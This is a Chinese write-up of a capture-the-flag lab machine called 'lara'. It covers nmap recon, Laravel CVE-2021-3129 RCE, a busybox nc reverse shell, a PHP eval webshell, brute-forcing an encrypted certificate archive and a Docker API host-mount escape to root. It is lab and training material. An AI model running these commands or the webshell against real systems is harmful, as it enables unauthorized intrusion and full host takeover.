当前位置: 首页 > news >正文

群友靶机lara复现 - 场

lara

nmap -p- 192.168.10.13                           
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 07:21 EST
Nmap scan report for lara (192.168.10.13)
Host is up (0.00085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 08:00:27:33:87:C0 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

80端口看起来没有东西,8000端口是个laravel,看起来是要打现有的poc。感觉是要去打CVE-2021-3129,但是试了几个poc都打不通。

joshuavanderpoll/CVE-2021-3129: Laravel RCE Exploit Script - CVE-2021-3129 (user-friendly with automatic log detection)这份可以打通。

直接反弹shell。

python3 poc.py --host http://192.168.10.13:8000/ --exec "busybox nc 192.168.10.11 6666 -e /bin/sh" --no-cache --force --chain laravel/rce12

发现好像提升不了稳定shell,看了一眼根目录发现.dockerenv,应该是docker环境了。不知道咋下手,没有学过docker逃逸。然后发现可以直接在/var/www/html下写马。直接往80端口下写马。

echo '<?php @eval($_POST["cmd"]);?>' > z.php
cat z.php
<?php @eval($_POST["cmd"]);?>

蚁剑连接拿下uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)权限。

注意到alice用户下发现openssl enc -aes-256-cbc -in certs.tar.gz -out tar.gz.enc -iter 10000 -pbkdf2还有一个.enc文件。

蚁剑下载不下来,直接xxd -p .enc然后from hex搞下来

让ai写个爆破脚本解密一下,密码060606拿到certs,是docker api凭证。socat把流量转发出来。./socat TCP-LISTEN:1234,fork,bind=0.0.0.0 TCP:127.0.0.1:2376

docker --tls \--tlscacert=ca.pem \--tlscert=client-cert.pem \--tlskey=client-key.pem \-H=tcp://192.168.10.13:1234 \version
Client:Version:           27.5.1+dfsg4API version:       1.47Go version:        go1.24.9Git commit:        cab968b3Built:             Thu Nov  6 10:43:49 2025OS/Arch:           linux/amd64Context:           defaultServer:Engine:Version:          28.3.3API version:      1.51 (minimum version 1.24)Go version:       go1.24.11Git commit:       bea959c7b793b32a893820b97c4eadc7c87fabb0Built:            Tue Dec  2 23:05:51 2025OS/Arch:          linux/amd64Experimental:     falsecontainerd:Version:          v2.1.5GitCommit:        fcd43222d6b07379a4be9786bda52438f0dd16a1runc:Version:          1.3.4GitCommit:        d842d7719497cc3b774fd71620278ac9e17710e0docker-init:Version:          0.19.0GitCommit:        

提权

docker --tls \--tlscacert=ca.pem \--tlscert=client-cert.pem \--tlskey=client-key.pem \-H=tcp://192.168.10.13:1234 \images 
REPOSITORY     TAG       IMAGE ID       CREATED       SIZE
laravel-vuln   latest    aaf7bbe495b7   3 weeks ago   141MB
#直接拿现成的镜像用
docker --tls \--tlscacert=ca.pem \--tlscert=client-cert.pem \--tlskey=client-key.pem \-H=tcp://192.168.10.13:1234 \run -v /:/mnt --rm -it laravel-vuln chroot /mnt /bin/sh
/ # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cat /root/root.txt
flag{root-ede49d353365dfcf95b6bf8df1b7a2dc}

至此提权成功。

http://www.jsqmd.com/news/269742/

相关文章:

  • 小程序毕设选题推荐:基于django+微信小程序的健康生活系统个人健康生活平台小程序【附源码、mysql、文档、调试+代码讲解+全bao等】
  • 信件分析(2)
  • 探索人脸识别追踪:从图像采集到电机驱动的奇妙旅程
  • ​​​​​​​推荐10个数据备份与恢复工具?先搞懂这3种备份方式,再选才不踩坑!
  • 手把手教你降AI不伤文:保姆级操作让论文既通过检测又保持专业
  • FPGA 实现多路高精度 AD1246 高速数据采集与接收设计
  • ACPI!gReadyQueue中的plistCtxtQ和ACPI!GetOpRegionScopeWorker函数中的赋值*state->PciObj = state->Parent
  • 2026年8款免费降AI率工具实测推荐,毕业党必看
  • 微分方程一维抛物热传导方程数值解法全解析
  • 《实时渲染》第2章-图形渲染管线-2.2应用程序阶段
  • 深度解析2026论文优化方案:从DeepSeek到学术猹,谁是NLP降重的最优解? - 品牌观察员小捷
  • Comsol 中浆液扩散模型:注浆过程的数字化洞察
  • 2026降AI工具红黑榜:实测8款后我只推荐这3个
  • 打造学生信息管理系统:从构思到实现
  • 2026中专生考大数据与财务管理专业学习指南
  • 知网AIGC检测不通过?2026最新降AI攻略来了
  • 小程序毕设项目推荐-基于django+微信小程序的考研信息查询系统考研院校推荐系统 考研分数线发布查询【附源码+文档,调试定制服务】
  • ArcGIS大师之路500技---062调整面要素到指定面积
  • 知网AIGC检测不通过?学长亲测的避坑指南
  • 交变磁场下含感应材料沥青路面温度:奇妙的物理与技术融合
  • Xilinx FPGA实现延时链
  • 聊聊神奇的连续拉丝机自动控制程序
  • 探索直流有感无刷电机驱动器:功能与特色深度剖析
  • 整车性能仿真:Cruise与Matlab联合的五年经验分享
  • SAP 发布restful if_http_extension~handle_request demo
  • 完整教程:C语言文件操作函数解析
  • 基于C51单片机的智能鱼缸系统探索
  • 小程序毕设项目推荐-基于微信小程序的健康生活助手系统基于django+微信小程序的健康生活系统【附源码+文档,调试定制服务】
  • 昆仑通态直接控制变频器程序及通讯那些事儿
  • 2026年专业的车牌识别一体机,车牌识别系统,车牌识别道闸一体机厂家选型决策指南 - 品牌鉴赏师